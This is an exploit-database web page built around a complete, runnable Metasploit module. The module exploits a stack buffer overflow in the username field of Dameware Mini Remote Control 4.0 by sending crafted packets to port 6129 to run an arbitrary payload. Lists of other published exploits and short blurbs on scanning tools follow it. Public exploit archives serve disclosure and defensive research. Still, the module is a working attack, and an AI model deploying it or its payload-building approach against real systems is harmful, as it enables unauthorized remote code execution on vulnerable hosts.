Menu

Search for hundreds of thousands of exploits

"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)"

Author

Exploit author

"James Fitts"

Platform

Exploit platform

windows

Release date

Exploit published date

2017-09-13

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow vulnerability found
				in Dameware Mini Remote Control v4.0. The overflow is caused when sending
				an overly long username to the DWRCS executable listening on port 6129.
				The username is read into a strcpy() function causing an overwrite of
				the return pointer leading to arbitrary code execution.
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'CVE', '2005-2842' ],
					[ 'BID', '14707' ],
					[ 'URL', 'http://secunia.com/advisories/16655' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'	=> 140,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'        =>
						{
							'SymbolLookup' => '+ws2ord',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 
						'Windows XP SP3 EN', 
							{ 
								# msvcrt.dll
								# push esp/ retn
								'Ret' => 0x77c35459, 
							} 
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Sept 01 2005'))

		register_options(
			[
				Opt::RPORT(6129),
			], self.class )
	end

	def pkt1
		p = payload.encoded

		boom = "\x43" * 259
		boom[100, 4] = [target.ret].pack('V')
		boom[108, p.length] = p

		packet = "\x00" * 4056
		packet[0, 4] = "\x30\x11\x00\x00"
		packet[4, 4] = "\x00\x00\x00\x00"
		packet[8, 4] = "\xd7\xa3\x70\x3d"
		packet[12, 4] = "\x0a\xd7\x0d\x40"
		packet[16, 20] = "\x00" * 20
		packet[36, 4] = "\x01\x00\x00\x00"

		packet[40, 4] = [0x00002710].pack('V')
		packet[196, 259] = rand_text_alpha(259)
		packet[456, 259] = boom
		packet[716, 259] = rand_text_alpha(259)
		packet[976, 259] = rand_text_alpha(259)
		packet[1236, 259] = rand_text_alpha(259)
		packet[1496, 259] = rand_text_alpha(259)

		return packet
	end

	def pkt2
		packet = "\x00" * 4096
		packet[756, 259] = rand_text_alpha(259)

		return packet
		
	end

	def exploit
		connect

		sock.put(pkt1)
		sock.recv(1024)
		sock.put(pkt2)
		sock.recv(84)

		handler
		disconnect
	end

end
__END__
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-09-27 "LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)" remote multiple "James Fitts"
2017-09-14 "Cloudview NMS 2.00b - Writable Directory Traversal Execution (Metasploit)" remote windows "James Fitts"
2017-09-14 "EMC AlphaStor Library Manager < 4.0 build 910 - Opcode 0x4f Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "haneWIN DNS Server 1.5.3 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "EMC AlphaStor Device Manager - Opcode 0x72 Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "Lockstep Backup for Workgroups 4.0.3 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-14 "KingScada AlarmServer 3.1.2.13 - Remote Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)" remote linux "James Fitts"
2017-09-13 "Infinite Automation Mango Automation - Command Injection (Metasploit)" remote jsp "James Fitts"
2017-09-13 "Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Trend Micro Control Manager - ImportFile Directory Traversal Remote Code Execution (Metasploit)" remote php "James Fitts"
2017-09-13 "Alienvault OSSIM av-centerd - Util.pm sync_rserver Command Execution (Metasploit)" remote linux "James Fitts"
2017-09-13 "Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)" remote windows "James Fitts"
2017-09-13 "Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)" remote java "James Fitts"
2017-09-13 "Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Motorola Netopia Netoctopus SDCS - Remote Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Sielco Sistemi Winlog 2.07.16 - Remote Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit)" remote windows "James Fitts"
2017-09-13 "Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)" webapps windows "James Fitts"
2017-09-13 "Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)" webapps windows "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2014-08-14 "Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)" remote linux "James Fitts"
2014-06-13 "Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)" remote linux "James Fitts"
2011-08-04 "ABBS Audio Media Player 3.0 - Local Buffer Overflow (Metasploit)" local windows "James Fitts"
2011-08-04 "FreeAmp 2.0.7 - '.fat' Local Buffer Overflow (Metasploit)" local windows "James Fitts"
2011-08-04 "ABBS Electronic Flashcards 2.1 - Local Buffer Overflow (Metasploit)" local windows "James Fitts" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected